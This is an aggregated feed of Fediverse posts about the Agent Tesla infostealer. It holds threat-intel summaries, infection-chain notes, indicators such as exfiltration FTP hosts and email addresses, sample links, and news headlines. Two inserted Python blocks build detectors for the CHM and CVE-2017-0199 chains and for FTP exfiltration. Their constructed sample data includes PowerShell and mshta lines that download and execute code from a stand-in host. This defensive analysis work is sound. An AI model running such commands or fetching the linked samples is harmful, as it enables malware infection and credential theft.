#agenttesla — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #agenttesla, aggregated by home.social.
-
Analyzing a Malicious Compiled HTML Help File Delivering Agent Tesla
Pulse ID: 69eaf82210e0ac6fd2a26c35
Pulse Link: https://otx.alienvault.com/pulse/69eaf82210e0ac6fd2a26c35
Pulse Author: Tr1sa111
Created: 2026-04-24 04:57:06
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#AgentTesla #CyberSecurity #HTML #InfoSec #OTX #OpenThreatExchange #Tesla #bot #Tr1sa111
-
Analyzing a Malicious Compiled HTML Help File Delivering Agent Tesla
This analysis examines an attack chain utilizing malicious compiled HTML help (.chm) files for initial payload delivery. The attack begins with a 7zip compressed file containing a weaponized CHM file that displays a decoy window while executing obfuscated JavaScript code. This JavaScript launches PowerShell commands that verify internet connectivity by pinging Google, then downloads additional PowerShell code disguised as a JPEG file. The second stage decompresses and loads multiple byte arrays in memory, including a loader DLL and compressed Agent Tesla payload. The final Agent Tesla sample executes through process injection into RegAsm.exe and uses FTP protocol to exfiltrate stolen data including keystrokes, screenshots, and camera recordings to attacker-controlled infrastructure at ftp.videoalliance[.]ru.
Pulse ID: 69e991a65ee2b4802a077236
Pulse Link: https://otx.alienvault.com/pulse/69e991a65ee2b4802a077236
Pulse Author: AlienVault
Created: 2026-04-23 03:27:34
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#7Zip #AgentTesla #CyberSecurity #Google #HTML #InfoSec #Java #JavaScript #OTX #OpenThreatExchange #PowerShell #RAT #Tesla #Troll #ZIP #bot #AlienVault
-
2026-02-03 (Tuesday): #GuLoader for #AgentTesla style malware with FTP data exfiltration.
A #pcap of the infection traffic, associated files, and a list of indicators are available at https://www.malware-traffic-analysis.net/2026/02/03/index.html
Two online sandboxes tag this sample as AgentTesla, but I'm not sure what the actual name of this malware is.
- https://tria.ge/260203-tvhlyahx7c
- https://app.any.run/tasks/0840196f-2b8f-415c-8ca7-af0c8f394b0d
-
Fake Leonardo DiCaprio Movie Torrent Drops Agent Tesla Through Layered PowerShell Chain
#AgentTesla
https://www.bitdefender.com/en-us/blog/labs/fake-leonardo-dicaprio-movie-torrent-agent-tesla-powershell
-
📬 "One Battle After Another": torrent hides malware in subtitles
#Cyberangriffe #ITSicherheit #Warez #AgentTesla #BeniciodelToro #Bitdefender #LeonardoDiCaprio #OneBattleAfterAnother #SeanPenn https://sc.tarnkappe.info/d99b71
-
Cybercriminals are luring torrent users with a fake Leonardo DiCaprio movie, "One Battle After Another," hiding Agent Tesla RAT in subtitle files and disguised payloads. The stealthy chain uses Windows tools for fileless infection, keylogging, and data theft—stay safe! 🚨🎥💻 https://cyberinsider.com/malware-sneaked-via-subtitles-file-of-fake-dicaprio-movie-torrent/ #Cybersecurity #Malware #AgentTesla #Newz
-
"One Battle After Another" torrent hides malware in subtitle files
A lot of streaming happens over Christmas. But beware of illegal sources! Fresh on the market: a fake torrent of the Leonardo DiCaprio film "One Battle After Another". Bundled in for free: the spyware Agent Tesla.
More: https://maniabel.work/archiv/783
#SpyTool #AgentTesla #windows #PowerShellScript #infosec #infosecnews #BeDiS
-
Torrent for DiCaprio’s “One Battle After Another” Movie Drops Agent Tesla https://hackread.com/dicaprio-one-battle-after-another-torrent-agent-tesla/ #FakeOneBattleAfterAnother #Cybersecurity #bitdefender #CyberAttack #AgentTesla #Security #Malware #Torrent #Movies #Fraud #Scam
-
Watch out as fake torrent for DiCaprio’s “One Battle After Another” is spreading Agent Tesla malware through malicious subtitles and hidden scripts.
Read: https://hackread.com/dicaprio-one-battle-after-another-torrent-agent-tesla/
#Cybersecurity #AgentTesla #Malware #Windows #OneBattleAfterAnother
-
Top 3 Malware Families in Q4: How to Keep Your SOC Ready https://hackread.com/top-3-malware-families-in-q4-how-to-keep-your-soc-ready/ #ThreatIntelligence #Cybersecurity #Vulnerability #LummaStealer #AgentTesla #Security #Malware #ANYRUN #XWorm #SOC
-
FakeUpdates, Remcos, AgentTesla Top Malware Charts in Stealth Attack Surge – Source:hackread.com https://ciso2ciso.com/fakeupdates-remcos-agenttesla-top-malware-charts-in-stealth-attack-surge-sourcehackread-com/ #1CyberSecurityNewsPost #CyberSecurityNews #cybersecurity #CyberAttack #FakeUpdates #AgentTesla #Hackread #security #malware #Remcos
-
FakeUpdates, Remcos, AgentTesla Top Malware Charts in Stealth Attack Surge https://hackread.com/fakeupdates-remcos-agenttesla-malware-attack-charts/ #Cybersecurity #CyberAttack #FakeUpdates #AgentTesla #Security #Malware #Remcos
-
2025-02-12 (Wed): #VIP_Recovery (an #AgentTesla variant) from Brazil #malspam --> zip attachment --> extracted EXE.
File name: Factura Gastos.exe
Email accounts for data exfiltration: antonipont@grupobdb[.]com --> cludsewe3@gmail[.]com
EXE available at: https://bazaar.abuse.ch/sample/c7620ccaf9c2d47ba08cf85e65e55ea974f8887e18d96574a1aa63f09e836451/
-
2025-02-07 (Friday): Today's boring example of #malspam pushing #GuLoader for #AgentTesla style malware. EXE of this malware available at https://bazaar.abuse.ch/sample/833aae0bc34e211145371b619b7c542864e9f864e26de1690fd2f6be76fcb174
-
2025-01-31 (Friday): Two pcaps with traffic of #AgentTesla-style data exfil.
One #pcap has FTP exfil, while the other pcap is "VIP Recovery" and has SMTP exfil.
Pcaps available at https://www.malware-traffic-analysis.net/2025/01/31/index.html
-
New TorNet Backdoor Exploits TOR Network in Advanced Phishing Attack – Source:hackread.com https://ciso2ciso.com/new-tornet-backdoor-exploits-tor-network-in-advanced-phishing-attack-sourcehackread-com/ #1CyberSecurityNewsPost #CyberSecurityNews #cybersecurity #Vulnerability #PhishingScam #CyberAttack #AgentTesla #backdoor #Hackread #Phishing #security #Germany #malware #Poland #TorNet #Tor
-
New TorNet Backdoor Exploits TOR Network in Advanced Phishing Attack https://hackread.com/tornet-backdoor-exploits-tor-network-phishing-attack/ #Cybersecurity #Vulnerability #PhishingScam #CyberAttack #AgentTesla #Security #backdoor #Phishing #Malware #Germany #Poland #TorNet #Tor
-
2025-01-09 (Thursday):
#CVE-2017-0199 Excel (#XLS) file --> #HTA --> #VBS --> #steganography --> #DBatLoader or #GuLoader style malware for #AgentTesla. Data exfil over FTP. A #pcap from an infection, the associated malware, and more info available at www.malware-traffic-analysis.net/2025/01/09/index.html
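Both delivery chains quoted on this page reduce to a handful of parent/child and command-line relationships that a Sysmon event ID 1 or EDR process-creation feed exposes: the CHM post earlier on the page (a .chm is rendered by the Windows HTML Help executable, hh.exe; its obfuscated script launches PowerShell, which pings Google, fetches a ".jpg" that is really PowerShell, and ends with Agent Tesla injected into RegAsm.exe) and this post's CVE-2017-0199 chain (Excel hands off to the HTA host mshta.exe, the HTA drops VBS run by wscript.exe, and a steganographic image is pulled down before the loader stage). The following Python is an added example that serves both posts; it is not code from malware-traffic-analysis.net, AlienVault OTX or either post. It runs those relationships as rules over a constructed set of process-creation events (PIDs, paths, hosts and URLs are made up). Two assumptions are baked in and marked in the comments: that RegAsm.exe is spawned by the PowerShell stage that loaded the in-memory loader, and that one "script host fetches an image URL" rule is general enough to cover both the disguised-JPEG download and the steganography stage.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon event ID 1 / EDR equivalent)."""
    ts: str
    pid: int
    ppid: int
    image: str      # lowercase basename of the executable
    cmdline: str


SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Assumption (generalization): a script host pulling a URL that ends in an
# image extension covers both the "PowerShell disguised as a JPEG" download
# and the steganographic image stage of the CVE-2017-0199 chain.
IMAGE_URL = re.compile(r"https?://\S+?\.(?:jpe?g|png|gif|bmp)\b", re.IGNORECASE)

# Constructed sample telemetry: PIDs, paths, hosts and URLs are made up for
# this example; "example.test" stands in for the real download servers.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent("10:00:01", 100, 1, "explorer.exe", "explorer.exe"),
    # CHM chain: hh.exe renders the .chm, its script launches PowerShell,
    # which pings Google, fetches a ".jpg", and (assumption) spawns RegAsm.exe.
    ProcEvent("10:00:05", 200, 100, "hh.exe",
              r'"C:\Windows\hh.exe" C:\Users\u\Downloads\invoice.chm'),
    ProcEvent("10:00:06", 201, 200, "powershell.exe",
              'powershell.exe -w hidden -c "ping google.com; '
              'iex (iwr http://example.test/x.jpg)"'),
    ProcEvent("10:00:07", 202, 201, "ping.exe", "ping google.com"),
    ProcEvent("10:00:12", 203, 201, "regasm.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"),
    # CVE-2017-0199 chain: Excel -> mshta.exe (HTA) -> wscript.exe (VBS)
    # -> PowerShell fetching the steganographic image.
    ProcEvent("11:00:01", 300, 100, "excel.exe",
              r'"C:\Program Files\Microsoft Office\EXCEL.EXE" quote.xls'),
    ProcEvent("11:00:02", 301, 300, "mshta.exe",
              "mshta.exe http://example.test/q.hta"),
    ProcEvent("11:00:03", 302, 301, "wscript.exe",
              r"wscript.exe C:\Users\u\AppData\Local\Temp\q.vbs"),
    ProcEvent("11:00:04", 303, 302, "powershell.exe",
              'powershell.exe -ep bypass -c "$i = iwr http://example.test/pic.png"'),
    # Benign noise: RegAsm.exe launched from Visual Studio must not fire.
    ProcEvent("12:00:00", 400, 100, "devenv.exe", "devenv.exe"),
    ProcEvent("12:00:01", 401, 400, "regasm.exe", "RegAsm.exe mylib.dll /codebase"),
]


def evaluate(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule_name, pid) for every event whose parent/child pairing or
    command line matches one stage of the two chains."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    hits: List[Tuple[str, int]] = []
    for e in events:
        parent = by_pid.get(e.ppid)
        pimg = parent.image if parent else ""
        if pimg == "hh.exe" and e.image in SCRIPT_HOSTS:
            hits.append(("chm_spawns_script_host", e.pid))
        if pimg in OFFICE_APPS and e.image == "mshta.exe":
            hits.append(("office_spawns_mshta", e.pid))
        if pimg == "mshta.exe" and e.image in SCRIPT_HOSTS:
            hits.append(("mshta_spawns_script_host", e.pid))
        if e.image in SCRIPT_HOSTS and IMAGE_URL.search(e.cmdline):
            hits.append(("script_host_fetches_image_url", e.pid))
        if e.image == "regasm.exe" and pimg in SCRIPT_HOSTS:
            hits.append(("regasm_from_script_host", e.pid))
    return hits


def ancestry(events: List[ProcEvent], pid: int) -> List[str]:
    """Walk ppid links upward and return the image chain root-first, so an
    analyst sees e.g. explorer.exe -> hh.exe -> powershell.exe -> regasm.exe."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid].image)
        pid = by_pid[pid].ppid
    return list(reversed(chain))


if __name__ == "__main__":
    for rule, pid in evaluate(SAMPLE_EVENTS):
        print(f"{rule:32s} pid={pid:<4d} chain={' -> '.join(ancestry(SAMPLE_EVENTS, pid))}")
```

Each rule is deliberately narrow and fires on a single event, so the same code maps onto one Sigma rule per stage; correlating two or more hits on one ancestry chain, as the printed output makes visible, is what separates these infections from a lone developer running RegAsm.exe.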
-
2024-12-04 (Wednesday): #AgentTesla variant using FTP for data exfiltration.
Don't know if this is OriginLogger, Snake (Key) Logger, or VIP Recovery/VIP Key Logger, but it's a variant of AgentTesla.
I've posted a sanitized copy of the email distributing the malware, a #pcap from an infection run, the associated #malware samples, and a list of indicators at https://www.malware-traffic-analysis.net/2024/12/04/index.html
-
2024-11-25 (Monday): I love it when criminals email malware directly to my inbox. This one is #AgentTesla (or #OriginLogger or whatever it's called now) using FTP for data exfiltration.
It sends harvested login credentials, browser cookies and keylogger data to an FTP server at ftp.ercolina-usa[.]com approx every 10 minutes.
As noted in one of the images, two-letter indicators in the file names indicate the type of exfiltrated data:
PW = login credentials harvested from the infected Windows host (passwords)
CO = cookies and other data from web browsers on the infected host
KL = Keylogger data from any collected keystrokes on the infected host.
Attached disk image file: https://bazaar.abuse.ch/sample/7a11d2d4ea5b0bf486c6e6695ff919e58aa54babb77061f4bbfe476ce1ec1738
Extracted AgentTesla EXE: https://bazaar.abuse.ch/sample/2362b4a5329f506af677d1e4cac2b92da252afdf4842bf4e8796b43c4ccb6714
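The two-letter prefixes listed in the post above give a cheap way to label what an AgentTesla-style FTP exfiltration is carrying, and the roughly ten-minute upload cadence is a second signal. The following Python is an added example, not code from the post or from malware-traffic-analysis.net. It walks a constructed FTP control-channel export (timestamp, client, server, command, the shape a tshark field export of ftp.request.command gives; hosts, credentials and file names are made up), labels each STOR by the prefix of the uploaded file name, and reports per-flow counts plus the median gap between uploads so the periodic PW/CO/KL pattern stands out against a one-off backup upload.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import median
from typing import Dict, List, Optional, Tuple

# Two-letter prefixes exactly as the post lists them; anything else is
# reported as an unknown prefix rather than silently mapped.
PREFIX_TYPE = {"PW": "credentials", "CO": "browser cookies", "KL": "keystrokes"}
PREFIX_RE = re.compile(r"^([A-Z]{2})_")

# Constructed FTP control-channel lines: (timestamp, client, server, command).
# Hosts, credentials and file names are made up; "example.test" stands in
# for the attacker's FTP server.
SAMPLE_LOG: List[Tuple[str, str, str, str]] = [
    ("2024-11-25 14:00:03", "10.0.0.5", "ftp.example.test", "USER exfil"),
    ("2024-11-25 14:00:03", "10.0.0.5", "ftp.example.test", "PASS hunter2"),
    ("2024-11-25 14:00:04", "10.0.0.5", "ftp.example.test", "STOR PW_user-DESKTOP_2024_11_25_14_00_04.html"),
    ("2024-11-25 14:00:05", "10.0.0.5", "ftp.example.test", "STOR CO_user-DESKTOP_2024_11_25_14_00_05.html"),
    ("2024-11-25 14:10:06", "10.0.0.5", "ftp.example.test", "STOR KL_user-DESKTOP_2024_11_25_14_10_06.html"),
    ("2024-11-25 14:20:07", "10.0.0.5", "ftp.example.test", "STOR KL_user-DESKTOP_2024_11_25_14_20_07.html"),
    ("2024-11-25 14:30:08", "10.0.0.5", "ftp.example.test", "STOR KL_user-DESKTOP_2024_11_25_14_30_08.html"),
    # Benign noise: a scheduled backup to an internal FTP server.
    ("2024-11-25 14:05:00", "10.0.0.9", "backup.example.test", "STOR nightly_2024-11-25.tar.gz"),
]


def classify_stor(command: str) -> Optional[str]:
    """Label a STOR command by the two-letter prefix of the uploaded file name.
    Returns None for non-STOR commands and 'unlabelled' for STORs whose file
    name does not start with an XX_ prefix."""
    if not command.upper().startswith("STOR "):
        return None
    name = command[5:].strip()
    m = PREFIX_RE.match(name)
    if not m:
        return "unlabelled"
    return PREFIX_TYPE.get(m.group(1), "unknown prefix " + m.group(1))


def summarize(log: List[Tuple[str, str, str, str]]) -> Dict[Tuple[str, str], dict]:
    """Per (client, server) flow: count of uploads by label and the median
    seconds between consecutive STORs (None when there is only one)."""
    flows: Dict[Tuple[str, str], dict] = defaultdict(
        lambda: {"types": defaultdict(int), "times": []})
    for ts, client, server, cmd in log:
        kind = classify_stor(cmd)
        if kind is None:
            continue
        flow = flows[(client, server)]
        flow["types"][kind] += 1
        flow["times"].append(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"))
    out: Dict[Tuple[str, str], dict] = {}
    for key, flow in flows.items():
        times = sorted(flow["times"])
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        out[key] = {
            "types": dict(flow["types"]),
            "uploads": len(times),
            "median_gap_s": median(gaps) if gaps else None,
        }
    return out


def flag_stealer_flows(summary: Dict[Tuple[str, str], dict]) -> List[Tuple[str, str]]:
    """Flows that uploaded at least one PW/CO/KL-labelled file."""
    stealer_labels = set(PREFIX_TYPE.values())
    return sorted(k for k, v in summary.items() if stealer_labels & set(v["types"]))


if __name__ == "__main__":
    summary = summarize(SAMPLE_LOG)
    for key, info in summary.items():
        print(key, info)
    print("flagged:", flag_stealer_flows(summary))
```

The prefix check is the high-confidence part; the median gap is there so an analyst can see the cadence at a glance, not as a threshold, because one pcap is too little to justify hard-coding "every 10 minutes" as a rule.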
-
CapLoader wasn’t designed as an alternative to a traditional NIDS, but the Alerts tab often gives a VERY good overview of the malicious traffic. Here’s a screenshot of CapLoader’s alerts for some recent PCAP files from malware-traffic-analysis.net.
#Lumma #GootLoader #AgentTesla #RURAT #Remcos #RedLine #BackConnect
-
Campaigns #Malware #Italy Week 35
🔥☠️💣👻
#VIPKeylogger: Bank transfer
#Remcos: Shipments
#Formbook: Orders
#AgentTesla: Payment
#Modiloader: Quotes
#APK #Zanubis: Device protection
-
Campaigns #Malware #Italy Week 32
🔥☠️💣👻
#SnakeKeyLogger: Summons
#Guloader: Order
#Formbook: Bank form
#AsyncRAT: Document
#RemcosRAT: Prices
#AgentTesla: Quote
#ModiLoader: Payment
#StrRat: Order
#RedLine: Quotation
#Vidar: Payment
#Ousaban: Document
-
Campaigns #Malware #Italy Week 29
☠️💣🔥👻
#AgentTesla: Order
#Formbook: Offer
#GuLoader: Electronic invoice
#Remcos: Bank
#Lokibot: Delivery
#SmokeLoader: Payments
#Irata: Malware APK
#RedLine: Offer
#Neshta: Order
#Ousaban: Lawsuit
#SnakeKeylogger: Invoice
-
Belarusian Government-Linked Threat Actor ‘UNC1151’ Targets Ukraine’s Ministry of Defense https://thecyberexpress.com/unc1151-targets-ukraine-ministry-of-defense/ #UkrainesMinistryofDefence #TheCyberExpressNews #CybersecurityNews #cybersecuritynews #CRILresearchers #TheCyberExpress #FirewallDaily #cybersecurity #ThreatActors #cobaltstrike #AgentTesla #Phishing #njRAT #CRIL
-
📬 Foxit PDF exploit: one careless click triggers an attack chain
#ITSicherheit #AgentTesla #DoNotTeam #Exploid #FOXITPDF #FoxitReader #pdf https://sc.tarnkappe.info/17d3b6
-
Campaigns #Malware #Italy Week 13
👻💣🔥☠️
#AgentTesla: Payments
#Remcos: Delivery
#Irata: APK Bank
#Phorpiex: Documents
#Guloader: Order
#PlanetStealer: Confirmation
#Lokibot: Quote
#Pikabot: Resend
-
Campaigns #Malware #Italy Week 08
🔥☠️💣👻
#AgentTesla: Order
#Formbook: Bank transfer
#SpyNote: APK Bank
#Pikabot: Resend
#AveMaria: Quote
#ModiLoader: List
#WiKiloader: Invoice
#Astaroth: Invoice
#Remcos: GLS parcel held at depot
-
⚠️ New day and a new "Invio Ordine Accompagnatorio" (dispatch order) lure spreads #AgentTesla in #Italy!
-
Here's some data analysis on the victims of the popular infostealer #AgentTesla aka #OriginLogger🔑⌨️🪵 https://www.bitsight.com/blog/data-insights-agenttesla-and-originlogger-victims
-
Campaigns #Malware #Italy Week 41
🔥 Persistent
#Ursnif: #AgenziaEntrate
#DarkGate: Resend link to a ZIP
#AgentTesla: Payment
💣 One-off
#RemcosRat: Payment
#Lokibot: Bank
#ScreenConnect: PDF invoice